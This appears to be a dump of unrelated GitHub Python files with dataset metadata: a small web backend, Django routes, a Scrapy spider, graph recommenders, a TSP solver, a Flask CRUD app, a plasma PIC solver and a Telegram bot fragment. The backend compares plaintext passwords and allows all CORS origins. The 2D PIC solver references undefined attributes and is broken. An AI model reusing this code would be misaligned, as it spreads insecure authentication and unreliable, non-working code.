CustomServer(MicroWebSrv2):\n def __init__(self, database: Graph):\n super().__init__()\n self.AllowAllOrigins=True # Permitir requisições de qualquer endpoint\n self.CORSAllowAll = True # Permtir troca de recursos (dados) sem protocolo de segurança\n self.BindAddress = ('localhost', 3000) # Alterar a porta onde o backend estará disponível\n self.database = database\n self.shouldClearPlot = False\n\n def start(self):\n self.StartManaged() \n\n def stop(self,):\n self.Stop() \n\n # Cadastrar usuário/empresa\n @WebRoute(POST, '/signup', name=\"signup\")\n def Signup(self, request):\n newEntity = request.GetPostedJSONObject()\n self.database.addNode(newEntity)\n request.Response.ReturnOk()\n\n # Logar usuário/empresa\n @WebRoute(POST, '/login', name=\"login\")\n def Login(self, request):\n body = request.GetPostedJSONObject()\n email = body['email']\n password = body['password']\n\n user = self.database.getNodeByEmail(email)\n\n if not user:\n return request.Response.ReturnBadRequest()\n\n if user.value['password'] != password:\n return request.Response.ReturnUnauthorized('Invalid information')\n \n userCopy = user.copy()\n userCopy[\"id\"] = user.getId()\n request.Response.ReturnOkJSON(userCopy)\n \n # Carregar os nodos que se relacionam com o usuário de id \n @WebRoute(GET, '/relations/', name=\"relations\")\n def LoadRelations(self, request, args):\n userId = args['userid']\n user = self.database.getNode(userId)\n\n if user:\n relations = self.database.getNodeRelationsNodes(userId, user.getConnections()[0])\n return request.Response.ReturnOkJSON({ 'relations': relations })\n \n request.Response.ReturnBadRequest()\n \n # Carregar as TODAS as entidades, por busca em largura\n # O usuário com id será a raiz da busca\n @WebRoute(GET, '/entities/', name=\"entities\")\n def LoadEntities(self, request, args):\n params = request.QueryParams\n \n userId = args['userid']\n search = params['search']\n searchKey = params['searchKey']\n\n user = self.database.getNode(userId)\n \n if user:\n searchResults = self.database.wideSearch(userId, search, searchKey)\n request.Response.ReturnOkJSON({ 'entities': searchResults })\n \n request.Response.ReturnBadRequest()\n\n # Montar e retornar o grafo (.png), com e sem foca no usuário\n @WebRoute(GET, '/graph/', name=\"graph\")\n def CreateGraph(self, request, args):\n userId = args['userid']\n\n self.shouldClearPlot = plotAndSaveGraph(self.database, userId)\n return request.Response.ReturnFile('./files/graph.jpg')\n\n # Adicionar/deletar a relação x do usuário de id userid\n @WebRoute(PUT, '/relation/', name=\"add_remove_relation\")\n def EditRelation(self, request, args):\n body = request.GetPostedJSONObject()\n userId = args['userid']\n entityId = body['entityId']\n relationType = body['relationType']\n operation = body['operation']\n\n if operation == 'create':\n self.database.addEdge(userId, entityId, relationType)\n return request.Response.ReturnOk()\n\n elif operation == 'delete':\n self.database.removeEdge(userId, entityId, relationType)\n return request.Response.ReturnOk()\n\n request.Response.ReturnBadRequest()\n","repo_name":"Joao-mello-ferrari/network","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22006971006","text":"def head(stream: \"file\", n: int = 10) -> bytes:\n \"\"\"Output the first part of the file.\n\n This function behaves like the Unix `head` command, but not all options have been\n implemented.\n\n Args:\n stream: File stream.\n\n n: Number of lines to output\n\n Return:\n The first part of the file.\n \"\"\"\n lines = []\n while n > 0:\n buf = stream.readline()\n if buf == b\"\":\n break\n lines.append(buf)\n n -= 1\n\n return b\"\".join(lines)\n","repo_name":"okomestudio/pyaides","sub_path":"src/pyaides/files/head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6188606416","text":"import pytest\n\nfrom task import solve_task1, solve_task2\n\n\n@pytest.mark.parametrize(\"file_name, result\",\n [(\"day_16/small_input.txt\", 71)])\ndef test_task1(file_name, result):\n r = solve_task1(file_name)\n assert r == result, f\"{file_name} failed. It returned with {r} instead of {result}.\"\n\n@pytest.mark.parametrize(\"file_name, result, key_word\",\n [(\"day_16/small_input.txt\", 14, \"seat\"),\n (\"day_16/small_input2.txt\", 12, \"class\")])\ndef test_task2(file_name, result, key_word):\n r = solve_task2(file_name, key_word)\n assert r == result, f\"{file_name} failed. It returned with {r} instead of {result}.\"\n","repo_name":"fuszti/advent_of_code_2020","sub_path":"day_16/test_units.py","file_name":"test_units.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25738504040","text":"from django.urls import path, include\nfrom Orders import views\n\napp_name = 'Orders'\n\nurlpatterns = [\n path('wcreate/', views.WorderCreateView.as_view(), name='CreateWorder'),\n path('wdelete//', views.deleteWorder, name='DeleteWorder'),\n path('tcreate/', views.TorderCreateView.as_view(), name='CreateTorder'),\n path('tdelete//', views.deleteTorder, name='DeleteTorder'),\n path('acreate/', views.AorderCreateView.as_view(), name='CreateAorder'),\n path('adelete//', views.deleteAorder, name='DeleteAorder'),\n path('', views.OrderIndexView.as_view(), name='index'),\n\n path('worderadmin/', views.WorderAdmin.as_view(), name='worderadmin'),\n path('worderadmin_approve//', views.approveWorder, name='ApproveWorder'),\n path('worderadmin_disapprove//', views.disapproveWorder, name='disApproveWorder'),\n path('worderadmin_collect//', views.collectWorder, name='CollectWorder'),\n path('worderadmin_return//', views.returnWorder, name='ReturnWorder'),\n\n path('torderadmin/', views.TorderAdmin.as_view(), name='torderadmin'),\n path('torderadmin_approve//', views.approveTorder, name='ApproveTorder'),\n path('torderadmin_disapprove//', views.disapproveTorder, name='disApproveTorder'),\n path('torderadmin_collect//', views.collectTorder, name='CollectTorder'),\n path('torderadmin_return//', views.returnTorder, name='ReturnTorder'),\n\n path('aorderadmin/', views.AorderAdmin.as_view(), name='aorderadmin'),\n path('aorderadmin_approve//', views.approveAorder, name='ApproveAorder'),\n path('aorderadmin_disapprove//', views.disapproveAorder, name='disApproveAorder'),\n\n path('worderadmin_comment//', views.CommentWorder.as_view(), name='CommentWorder'),\n\n]","repo_name":"MajoRoth/gimel","sub_path":"Orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71883926772","text":"from scrapy import Selector, Request, FormRequest\nfrom scrapy.spiders import Spider\n\nfrom xiecheng.items import SightItem\n\n\nclass Sight(Spider):\n name = 'sight'\n domin_url ='http://you.ctrip.com/sight/chengdu104'\n start_urls = {\n 'http://you.ctrip.com/sight/chengdu104.html',\n }\n # 景点分页\n def parse(self, response):\n sel = Selector(response)\n numpage = sel.xpath('//div[@class=\"ttd_pager cf\"]/div/span/b/text()').extract()[0]\n for page in range(int(numpage) + 1):\n yield Request(self.domin_url + '/s0-p' + str(page) + 'html#sightname',\n callback=self.sight_parse)\n\n # 分析每个景点的数据\n def sight_parse(self, response):\n sel = Selector(response)\n sight_list = sel.xpath('//div[@class=\"list_mod2\"]')\n for sight in sight_list:\n item = SightItem()\n item['img'] = sight.xpath('./div[1]/a/img/@src').extract()[0]\n item['name'] = sight.xpath('./div[2]/dl/dt/a/text()').extract()[0]\n item['place'] = sight.xpath('./div[2]/dl/dd[1]/text()').extract()[0]\n item['level'] = sight.xpath('./div[2]/dl/dd[2]/text()[1]').extract()[0]\n item['price'] = sight.xpath('./div[2]/dl/dd[2]/span/span/text()').extract()\n item['rate'] = sight.xpath('./div[2]/ul/li[1]/a/strong/text()').extract()[0]\n yield item\n\n\n","repo_name":"Lqq520/projects","sub_path":"xiecheng/xiecheng/spiders/sight.py","file_name":"sight.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31460120586","text":"import numpy as np\nimport pandas as pd\nimport random\nimport scipy.sparse as sp\nimport tensorflow as tf\n\nfrom tensorflow.keras.utils import Progbar\n\n\nclass GraphConv(tf.keras.layers.Layer):\n def __init__(self, adj_mat, weight=True):\n super(GraphConv, self).__init__()\n self.adj_mat = adj_mat\n self.weight = weight\n\n def build(self, input_shape):\n if self.weight:\n self.W = self.add_weight('kernel',\n shape=[int(input_shape[-1]),\n int(input_shape[-1])])\n\n def call(self, ego_embeddings):\n output = tf.sparse.sparse_dense_matmul(self.adj_mat, ego_embeddings)\n if self.weight:\n output = tf.transpose(tf.matmul(self.W, output, transpose_a=False, transpose_b=True))\n return output\n\n\nclass LightGCN(tf.keras.Model):\n def __init__(self, adj_mat, n_users, n_items, n_layers=3, emb_dim=64):\n super(LightGCN, self).__init__()\n self.adj_mat = adj_mat\n self.R = tf.sparse.to_dense(adj_mat)[:n_users, n_users:]\n self.n_users = n_users\n self.n_items = n_items\n self.n_layers = n_layers\n self.emb_dim = emb_dim\n\n # Initialize user and item embeddings.\n initializer = tf.keras.initializers.GlorotNormal()\n self.user_embedding = tf.Variable(\n initializer([self.n_users, self.emb_dim]), name='user_embedding'\n )\n self.item_embedding = tf.Variable(\n initializer([self.n_items, self.emb_dim]), name='item_embedding'\n )\n\n # Stack light graph convolutional layers.\n self.gcn = [GraphConv(adj_mat, weight=False) for layer in range(n_layers)]\n\n def call(self, inputs):\n user_emb, item_emb = inputs\n output_embeddings = tf.concat([user_emb, item_emb], axis=0)\n all_embeddings = [output_embeddings]\n\n # Graph convolutions.\n for i in range(0, self.n_layers):\n output_embeddings = self.gcn[i](output_embeddings)\n all_embeddings += [output_embeddings]\n\n # Compute the mean of all layers\n all_embeddings = tf.stack(all_embeddings, axis=1)\n all_embeddings = tf.reduce_mean(all_embeddings, axis=1, keepdims=False)\n\n # Split into users and items embeddings\n new_user_embeddings, new_item_embeddings = tf.split(\n all_embeddings, [self.n_users, self.n_items], axis=0\n )\n\n return new_user_embeddings, new_item_embeddings\n\n def fit(self, epochs=10, batch_size=128, optimizer=None, decay=0.0001):\n if optimizer is None:\n optimizer = tf.keras.optimizers.Adam(learning_rate=1e-3)\n\n # Keep track of which movies each user has reviewed.\n interacted = (\n pd.DataFrame(\n {\"userId_new\": np.nonzero(self.R)[0], \"movie_interacted\": np.nonzero(self.R)[1]}\n )\n .groupby(\"userId_new\")[\"movie_interacted\"]\n .apply(set)\n .reset_index()\n )\n\n # Custom training loop from scratch.\n for epoch in range(1, epochs + 1):\n print('Epoch %d/%d' % (epoch, epochs))\n n_batch = tf.math.count_nonzero(self.R).numpy() // batch_size + 1\n bar = Progbar(n_batch, stateful_metrics='training loss')\n for idx in range(1, n_batch + 1):\n # Sample batch_size number of users with positive and negative items.\n indices = range(self.n_users)\n if self.n_users < batch_size:\n users = np.array([random.choice(indices) for _ in range(batch_size)])\n else:\n users = np.array(random.sample(indices, batch_size))\n\n def sample_neg(x):\n while True:\n neg_id = random.randint(0, self.n_items - 1)\n if neg_id not in x:\n return neg_id\n\n # Sample a single movie for each user that the user did and did not review.\n interact = interacted.iloc[users]\n pos_items = interact['movie_interacted'].apply(lambda x: random.choice(list(x)))\n neg_items = interact['movie_interacted'].apply(lambda x: sample_neg(x))\n\n users, pos_items, neg_items = users, np.array(pos_items), np.array(neg_items)\n\n with tf.GradientTape() as tape:\n # Call model with user and item embeddings.\n new_user_embeddings, new_item_embeddings = self(\n (self.user_embedding, self.item_embedding)\n )\n\n # Embeddings after convolutions.\n user_embeddings = tf.nn.embedding_lookup(new_user_embeddings, users)\n pos_item_embeddings = tf.nn.embedding_lookup(new_item_embeddings, pos_items)\n neg_item_embeddings = tf.nn.embedding_lookup(new_item_embeddings, neg_items)\n\n # Initial embeddings before convolutions.\n old_user_embeddings = tf.nn.embedding_lookup(\n self.user_embedding, users\n )\n old_pos_item_embeddings = tf.nn.embedding_lookup(\n self.item_embedding, pos_items\n )\n old_neg_item_embeddings = tf.nn.embedding_lookup(\n self.item_embedding, neg_items\n )\n\n # Calculate loss.\n pos_scores = tf.reduce_sum(\n tf.multiply(user_embeddings, pos_item_embeddings), axis=1\n )\n neg_scores = tf.reduce_sum(\n tf.multiply(user_embeddings, neg_item_embeddings), axis=1\n )\n regularizer = (\n tf.nn.l2_loss(old_user_embeddings)\n + tf.nn.l2_loss(old_pos_item_embeddings)\n + tf.nn.l2_loss(old_neg_item_embeddings)\n )\n regularizer = regularizer / batch_size\n mf_loss = tf.reduce_mean(tf.nn.softplus(-(pos_scores - neg_scores)))\n emb_loss = decay * regularizer\n loss = mf_loss + emb_loss\n\n # Retreive and apply gradients.\n grads = tape.gradient(loss, self.trainable_weights)\n optimizer.apply_gradients(zip(grads, self.trainable_weights))\n\n bar.add(1, values=[('training loss', float(loss))])\n\n\n def recommend(self, users, k):\n # Calculate the scores.\n new_user_embed, new_item_embed = self((self.user_embedding, self.item_embedding))\n user_embed = tf.nn.embedding_lookup(new_user_embed, users)\n test_scores = tf.matmul(user_embed, new_item_embed, transpose_a=False, transpose_b=True)\n test_scores = np.array(test_scores)\n\n # Remove movies already seen.\n test_scores += sp.csr_matrix(self.R)[users, :] * -np.inf\n\n # Get top movies.\n test_user_idx = np.arange(test_scores.shape[0])[:, None]\n top_items = np.argpartition(test_scores, -k, axis=1)[:, -k:]\n top_scores = test_scores[test_user_idx, top_items]\n sort_ind = np.argsort(-top_scores)\n top_items = top_items[test_user_idx, sort_ind]\n top_scores = top_scores[test_user_idx, sort_ind]\n top_items, top_scores = np.array(top_items), np.array(top_scores)\n\n # Create Dataframe with recommended movies.\n topk_scores = pd.DataFrame(\n {\n 'userId': np.repeat(users, top_items.shape[1]),\n 'movieId': top_items.flatten(),\n 'prediction': top_scores.flatten(),\n }\n )\n\n return topk_scores\n\nclass NGCF(LightGCN):\n def __init__(self, adj_mat, n_users, n_items, n_layers=3, emb_dim=64):\n super(NGCF, self).__init__(adj_mat, n_users, n_items, n_layers=3, emb_dim=64)\n\n # Stack graph convolutional layers.\n self.gcn = [GraphConv(adj_mat, weight=True) for layer in range(n_layers)]\n","repo_name":"sparsh-ai/reco-tut-mlh","sub_path":"code/models/GCN.py","file_name":"GCN.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71284059252","text":"import numpy as np\nimport scipy as sp\nfrom tqdm.auto import tqdm\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import Axes\nfrom typing import Literal\nfrom scipy import linalg\nfrom src.utils import SORsolver\n\n# 2D two-stream instability simulation by solving 2D vlasov equation solver using PIC method\nclass PICsolver:\n def __init__(\n self, \n N : int, \n N_mesh : int, \n n0:float,\n Lx : float, \n Ly : float,\n dt : float, \n tmin : float, \n tmax : float, \n gamma : float,\n vth : float,\n vb : float,\n use_animation:bool=True,\n plot_freq : int = 4, \n save_dir : str = \"./result/simulation-2D.gif\"\n ):\n \n # setup\n self.N = N # num of particles\n self.N_mesh = N_mesh # num of mesh cell\n self.n0 = n0 # average electron density\n self.Lx = Lx\n self.Ly = Ly\n self.dt = dt # time difference\n self.tmin = tmin # minimum time\n self.tmax = tmax # maximum time\n self.gamma = gamma # parameters for solving linear equation of variant form of Tri-diagonal matrix\n self.use_animation = use_animation\n self.plot_freq = plot_freq\n self.save_dir = save_dir\n \n # particle information\n self.dx = Lx / N_mesh\n self.dy = Ly / N_mesh\n \n # initialize position, velocity and acceleration of particles\n self.pos = np.zeros((N,2))\n self.vel = np.zeros((N,2))\n self.acc = np.zeros((N,2))\n \n # electric potential, E-field and B-field : field dynamics\n self.phi_mesh = np.zeros((N_mesh, N_mesh))\n self.Ex_mesh = np.zeros((N_mesh, N_mesh))\n self.Ey_mesh = np.zeros((N_mesh, N_mesh))\n self.Bx_mesh = np.zeros((N_mesh, N_mesh))\n self.By_mesh = np.zeros((N_mesh, N_mesh))\n \n # Field representation for particle motion\n self.E = np.zeros((N, 2))\n self.B = np.zeros((N, 2))\n \n self.initialize_condition() # initialize x,v,a that is equivalent to the problem\n \n # index paramters for updating each mesh grid\n self.indx_l = np.zeros((N,2))\n \n self.indx_l[:,0] = np.floor(self.pos[:,0] / self.dx).astype(int)\n self.indx_l[:,1] = np.floor(self.pos[:,1] / self.dy).astype(int)\n self.indx_r = self.indx_l + np.ones_like(self.indx_l)\n \n self.weight_l = np.zeros_like(self.indx_l)\n self.weight_l[:,0] = (self.indx_r[:,0] * self.dx - self.pos[:,0]) / self.dx\n self.weight_l[:,1] = (self.indx_r[:,1] * self.dy - self.pos[:,1]) / self.dy\n \n self.weight_r = np.zeros_like(self.weight_l)\n self.weight_r[:,0] = (self.pos[:,0] - self.indx_l[:,0] * self.dx) / self.dx\n self.weight_r[:,1] = (self.pos[:,1] - self.indx_l[:,1] * self.dy) / self.dy\n \n # periodic BC\n self.indx_r = np.mod(self.indx_r, N_mesh)\n \n # electron density\n nx = np.bincount(self.indx_l[:,0], weights=self.weight_l[:,0], minlength=N_mesh)\n ny = np.bincount(self.indx_l[:,1], weights=self.weight_l[:,1], minlength=N_mesh)\n self.n = nx.reshape(-1,1) * ny.reshape(1,-1)\n \n nx = np.bincount(self.indx_r[:,0], weights=self.weight_r[:,0], minlength=N_mesh)\n ny = np.bincount(self.indx_r[:,1], weights=self.weight_r[:,1], minlength=N_mesh)\n self.n += nx.reshape(-1,1) * ny.reshape(1,-1)\n self.n *= self.n0 * (self.Lx / self.dx) * (self.Ly / self.dy) / self.N \n \n # gradient field and laplacian of potential\n self.grad_x = np.zeros((N_mesh, N_mesh))\n self.grad_y = np.zeros((N_mesh, N_mesh))\n self.laplacian = np.zeros((N_mesh * N_mesh, N_mesh*N_mesh))\n \n self.generate_grad()\n self.generate_laplacian()\n \n def initialize_condition(self): \n np.random.seed(42)\n \n def generate_grad(self):\n \n dx = self.dx\n dy = self.dy\n \n for idx_i in range(0,self.N_mesh):\n \n if idx_i > 0:\n self.grad_x[idx_i, idx_i - 1] = -1.0\n self.grad_y[idx_i, idx_i - 1] = -1.0\n \n if idx_i < self.N_mesh - 1:\n self.grad_x[idx_i, idx_i + 1] = 1.0\n self.grad_y[idx_i, idx_i - 1] = -1.0\n \n # periodic condition\n self.grad_x[0,self.N_mesh - 1] = -1.0\n self.grad_x[self.N_mesh - 1,0] = 1.0\n self.grad_x /= 2*dx\n \n self.grad_y[0,self.N_mesh - 1] = -1.0\n self.grad_y[self.N_mesh - 1,0] = 1.0\n self.grad_y /= 2*dy\n \n def compute_grad(self, A : np.ndarray, axis : Literal['x', 'y'] = 'x'):\n if axis == 'x':\n grad_A = self.grad_x * A.T\n else:\n grad_A = self.grad_y * A\n return grad_A\n \n def generate_laplacian(self):\n dx = self.dx\n dy = self.dy\n \n for idx_i in range(1,self.N_mesh-1):\n for idx_j in range(1,self.N_mesh-1):\n \n idx = self.N_mesh * idx_i + idx_j\n drow = self.N_mesh \n \n self.laplacian[idx, idx - 1] = 1.0 / dx ** 2\n self.laplacian[idx, idx + 1] = 1.0 / dx ** 2\n \n self.laplacian[idx, idx - drow] = 1.0 / dy ** 2\n self.laplacian[idx, idx + drow] = 1.0 / dy ** 2\n \n self.laplacian[idx, idx] = (-2.0) / dx ** 2 + (-2.0) / dy ** 2\n \n def linear_solve(self, A : np.ndarray, B : np.array):\n B = B.reshape(-1,1)\n x = linalg.solve(A,B)\n return x.reshape(-1,1)\n \n def solve(self):\n \n Nt = int(np.ceil((self.tmax - self.tmin) / self.dt))\n \n # we have to compute initial acceleration\n self.update_acc()\n \n if self.use_animation:\n pos_list = []\n vel_list = []\n \n pos_list.append(self.x)\n vel_list.append(self.v)\n \n else:\n pos_list = None\n vel_list = None\n \n for i in tqdm(range(Nt), 'PIC simulation process'):\n \n # velocity update\n self.update_velocity()\n \n # position update\n self.update_position()\n \n # density update\n self.update_density()\n \n # acceleration update\n self.update_acc()\n \n # velocity update with 1/2 kick\n self.update_velocity()\n \n if pos_list is not None:\n pos_list.append(self.x)\n vel_list.append(self.v)\n \n plt.figure(figsize = (6,4))\n plt.scatter(self.x[0:self.Nh],self.v[0:self.Nh],s=.5,color='blue', alpha=0.5)\n plt.scatter(self.x[self.Nh:], self.v[self.Nh:], s=.5,color='red', alpha=0.5)\n plt.xlabel(\"x pos\")\n plt.ylabel(\"vel\")\n plt.xlim([0,self.L])\n plt.ylim([-8, 8])\n plt.tight_layout()\n plt.savefig(\"./result/PIC.png\", dpi=160)\n print(\"# Computation process end\")\n \n if self.use_animation:\n print(\"# Generating animation file\")\n fig, ax = plt.subplots(1,1,figsize = (6,4), facecolor = 'white', dpi=160)\n \n def _plot(idx : int, ax:Axes, pos_list, vel_list):\n ax.cla()\n \n pos = pos_list[idx]\n vel = vel_list[idx]\n \n ax.scatter(pos[0:self.Nh],vel[0:self.Nh],s=.5,color='blue', alpha=0.5)\n ax.scatter(pos[self.Nh:], vel[self.Nh:], s=.5,color='red', alpha=0.5)\n ax.set_xlabel(\"x pos\")\n ax.set_ylabel(\"vel\")\n ax.set_xlim([0,self.L])\n ax.set_ylim([-8, 8])\n \n replay = lambda idx : _plot(idx, ax, pos_list, vel_list)\n idx_max = len(pos_list) - 1\n indices = [i for i in range(idx_max)]\n ani = animation.FuncAnimation(fig, replay, frames = indices)\n writergif = animation.PillowWriter(fps = self.plot_freq, bitrate = False)\n ani.save(self.save_dir, writergif)\n \n print(\"# Complete\")\n \n def update_velocity(self):\n self.vel += self.acc * self.dt / 2.0\n \n def update_position(self):\n self.pos += self.vel * self.dt\n self.pos[:,0] = np.mod(self.pos[:,0], self.Lx)\n self.pos[:,1] = np.mod(self.pos[:,1], self.Ly)\n \n def update_acc(self):\n self.phi_mesh = self.linear_solve(self.laplacian, self.n - self.n0).reshape(self.N_mesh, self.N_mesh)\n self.Ex_mesh = (-1) * self.compute_grad(self.phi_mesh, 'x')\n self.Ey_mesh = (-1) * self.compute_grad(self.phi_mesh, 'y')\n \n for idx in range(self.N):\n self.E[idx,0] = self.weight_l[idx,0] * self.Ex_mesh[self.indx_l[idx]] + self.weight_r[idx,0] * self.Ex_mesh[self.indx_r[idx]]\n self.E[idx,1] = self.weight_l[idx,1] * self.Ey_mesh[self.indx_l[idx]] + self.weight_r[idx,1] * self.Ey_mesh[self.indx_r[idx]] \n \n # update acceleration\n self.acc[:,0] = (-1) * (self.E[:,0] + self.vel[:,1] * self.B[:,0])\n self.acc[:,1] = (-1) * (self.E[:,1] - self.vel[:,0] * self.B[:,1])\n \n def update_density(self):\n self.indx_l[:,0] = np.floor(self.pos[:,0] / self.dx).astype(int)\n self.indx_l[:,1] = np.floor(self.pos[:,1] / self.dy).astype(int)\n self.indx_r = self.indx_l + np.ones_like(self.indx_l)\n \n self.weight_l = np.zeros_like(self.indx_l)\n self.weight_l[:,0] = (self.indx_r[:,0] * self.dx - self.pos[:,0]) / self.dx\n self.weight_l[:,1] = (self.indx_r[:,1] * self.dy - self.pos[:,1]) / self.dy\n \n self.weight_r = np.zeros_like(self.weight_l)\n self.weight_r[:,0] = (self.pos[:,0] - self.indx_l[:,0] * self.dx) / self.dx\n self.weight_r[:,1] = (self.pos[:,1] - self.indx_l[:,1] * self.dy) / self.dy\n \n # periodic BC\n self.indx_r = np.mod(self.indx_r, self.N_mesh)\n \n # electron density\n nx = np.bincount(self.indx_l[:,0], weights=self.weight_l[:,0], minlength=self.N_mesh)\n ny = np.bincount(self.indx_l[:,1], weights=self.weight_l[:,1], minlength=self.N_mesh)\n self.n = nx.reshape(-1,1) * ny.reshape(1,-1)\n \n nx = np.bincount(self.indx_r[:,0], weights=self.weight_r[:,0], minlength=self.N_mesh)\n ny = np.bincount(self.indx_r[:,1], weights=self.weight_r[:,1], minlength=self.N_mesh)\n self.n += nx.reshape(-1,1) * ny.reshape(1,-1)\n self.n *= self.n0 * (self.Lx / self.dx) * (self.Ly / self.dy) / self.N ","repo_name":"ZINZINBIN/PIC-plasmas","sub_path":"src/PIC2D.py","file_name":"PIC2D.py","file_ext":"py","file_size_in_byte":10903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22693448333","text":"from turfpy import measurement\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\n\n\ndef solve_tsp(points):\n distance_matrix = []\n for i in range(len(points)):\n dist_list = []\n for j in range(len(points)):\n start = [points.geometry[i].x, points.geometry[i].y]\n end = [points.geometry[j].x, points.geometry[j].y]\n dist = round(measurement.distance(start, end) * 1000)\n dist_list.append(dist)\n distance_matrix.append(dist_list)\n data = {\n 'distance_matrix': distance_matrix,\n 'num_vehicles': 1,\n 'depot': 0\n }\n\n manager = pywrapcp.RoutingIndexManager(len(data['distance_matrix']), data['num_vehicles'], data['depot'])\n routing = pywrapcp.RoutingModel(manager)\n\n def distance_callback(from_index, to_index):\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return data['distance_matrix'][from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC\n solution = routing.SolveWithParameters(search_parameters)\n\n index = routing.Start(0)\n route = [manager.IndexToNode(index)]\n while not routing.IsEnd(index):\n index = solution.Value(routing.NextVar(index))\n route.append(manager.IndexToNode(index))\n return route\n","repo_name":"gbsehnsucht/tsp_script","sub_path":"process_tsp.py","file_name":"process_tsp.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4477214794","text":"#!/usr/bin/env python3\nfrom flask import Flask, render_template, request, url_for, redirect\nfrom flask_sqlalchemy import SQLAlchemy\napp = Flask(__name__)\n#mysql\napp.config['SQLALCHEMY_DATABASE_URI']=\"mysql://root:root@127.0.0.1:3306/flask_products\"\n#mariadb\n#app.config['SQLALCHEMY_DATABASE_URI']=\"mariadb+mariadbconnector://root:root@127.0.0.1:3306/flask_products\"\ndb = SQLAlchemy(app)\n\n@app.route('/', methods=['GET','POST'])\ndef index():\n if request.method == \"POST\":\n productName = request.form[\"name\"]\n productPrice = request.form[\"price\"]\n productStock = request.form[\"quantity_in_stock\"]\n db.session.execute(\"INSERT INTO products(name,price,quantity_in_stock) VALUES(:n,:p ,:s)\",\n {\"n\":productName,\"p\":productPrice,\"s\":productStock})\n db.session.commit()\n return redirect(\"/\")\n else:\n products = db.session.execute(\"SELECT * FROM products\")\n return render_template('index.html',products=products)\n@app.route(\"/delete/\")\ndef delete(id):\n db.session.execute(\"DELETE FROM products WHERE id = :id\",{\"id\":id})\n db.session.commit()\n return redirect(\"/\")\n@app.route(\"/update/\", methods=[\"GET\",\"POST\"])\ndef update(id):\n if request.method == \"POST\":\n productName = request.form[\"name\"]\n productPrice = request.form[\"price\"]\n productStock = request.form[\"quantity_in_stock\"]\n db.session.execute(\"UPDATE products SET name= :n ,price= :p ,quantity_in_stock= :s WHERE id= :id\",\n {\"n\":productName,\"p\":productPrice,\"s\":productStock,\"id\":id})\n db.session.commit()\n return redirect(\"/\")\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Maxi-Fittipaldi/flask_app_ejemplo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12898060907","text":"import random\nimport threading\n\nimport peewee\nfrom telegram import ChatAction, InlineKeyboardButton, InlineKeyboardMarkup, ParseMode\nfrom telegram.ext import CallbackQueryHandler, CommandHandler\n\nfrom bot.api import Barrenero\nfrom bot.exceptions import BarreneroRequestException\nfrom bot.models import API, Chat\nfrom bot.state_machine import StatusStateMachine\nfrom bot.utils import humanize_iso_date\n\nstatus_machines = {}\nlock = threading.RLock()\n\n\nclass EtherMixin:\n def ether(self, bot, update):\n \"\"\"\n Call for Ether miner status and restarting service.\n \"\"\"\n chat_id = update.message.chat.id\n bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n\n try:\n Chat.get(id=chat_id)\n except peewee.DoesNotExist:\n self.logger.error('Chat unregistered')\n response_text = 'Configure me first'\n bot.send_message(chat_id, response_text)\n else:\n keyboard = [\n [\n InlineKeyboardButton(\"Status\", callback_data='[ether_status]'),\n InlineKeyboardButton(\"Nanopool\", callback_data='[ether_nanopool]')\n ],\n [\n InlineKeyboardButton(\"Restart\", callback_data='[ether_restart]'),\n ],\n ]\n reply_markup = InlineKeyboardMarkup(keyboard)\n bot.send_message(chat_id, 'Select an option:', reply_markup=reply_markup)\n\n def ether_nanopool(self, bot, update):\n \"\"\"\n Query for Nanopool account info.\n \"\"\"\n query = update.callback_query\n chat_id = query.message.chat_id\n\n bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)\n\n try:\n chat = Chat.get(id=chat_id)\n api = random.choice(chat.apis)\n data = Barrenero.ether(api.url, api.token)\n\n response_text = f'*Ether miner*\\n' \\\n f' - Balance: `{data[\"nanopool\"][\"balance\"][\"confirmed\"]} ETH`\\n\\n' \\\n f'*Hashrate*\\n' \\\n f' - Current: `{data[\"nanopool\"][\"hashrate\"][\"current\"]} MH/s`\\n' \\\n f' - 1 hour: `{data[\"nanopool\"][\"hashrate\"][\"one_hour\"]} MH/s`\\n' \\\n f' - 3 hours: `{data[\"nanopool\"][\"hashrate\"][\"three_hours\"]} MH/s`\\n' \\\n f' - 6 hours: `{data[\"nanopool\"][\"hashrate\"][\"six_hours\"]} MH/s`\\n' \\\n f' - 12 hours: `{data[\"nanopool\"][\"hashrate\"][\"twelve_hours\"]} MH/s`\\n' \\\n f' - 24 hours: `{data[\"nanopool\"][\"hashrate\"][\"twenty_four_hours\"]} MH/s`\\n\\n' \\\n f'*Last payment*\\n' \\\n f' - Date: 